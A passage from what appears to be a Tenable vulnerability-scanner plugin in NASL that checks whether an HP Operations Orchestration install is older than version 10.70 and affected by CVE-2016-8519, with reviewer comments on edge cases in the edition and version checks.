  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-8519");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/01/03");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/01/03");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/12");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:operations_orchestration");
  script_end_attributes();

  # Passive category: the plugin only evaluates detection results.
  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.");

  # The detection plugin must have populated the installed_sw KB tree,
  # otherwise there is no version/edition to compare.
  script_dependencies("hp_operations_orchestration_detect.nbin");
  script_require_keys("installed_sw/HP Operations Orchestration");
  script_require_ports("Services/www", 8080, 8443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

appname = "HP Operations Orchestration";
get_install_count(app_name:appname, exit_if_zero:TRUE);
port = get_http_port(default:8080);
# exit_if_unknown_ver:TRUE audits out when the detection plugin could not
# determine a version, so the comparison below never runs on an empty string.
install = get_single_install(app_name:appname, port:port, exit_if_unknown_ver:TRUE);

dir = install['path'];
version = install['version'];
edition = install['Edition'];
install_url = build_url(port:port, qs:dir);

# The advisory scope is the Community and Enterprise editions only; any other
# recorded edition is reported as not affected.
# NOTE(review): if the detection plugin did not record an 'Edition' key,
# edition is NULL and the two >!< tests decide the outcome — confirm that an
# unknown edition should be treated as not affected rather than as unknown.
if ("Community" >!< edition && "Enterprise" >!< edition)
  audit(AUDIT_WEB_APP_NOT_AFFECTED, appname + ' ' + edition, install_url);

# Fixed release per the HP advisory. Note the title says "10.x", but the
# code only tests "< 10.70": a version such as 9.x, if the detection plugin
# ever reported one, would also be flagged.
fix = "10.70";
# strict:FALSE — presumably tolerates a differing number of version
# components between 'version' and 'fix'; confirm against ver_compare.
if (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)
{
  # Report URL, installed and fixed version in a fixed field order.
  items = make_array("URL", install_url, "Installed version", version, "Fixed version", fix);
  order = make_list("URL", "Installed version", "Fixed version");
  report = report_items_str(report_items:items, ordered_fields:order);
  security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);
  exit(0);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, version);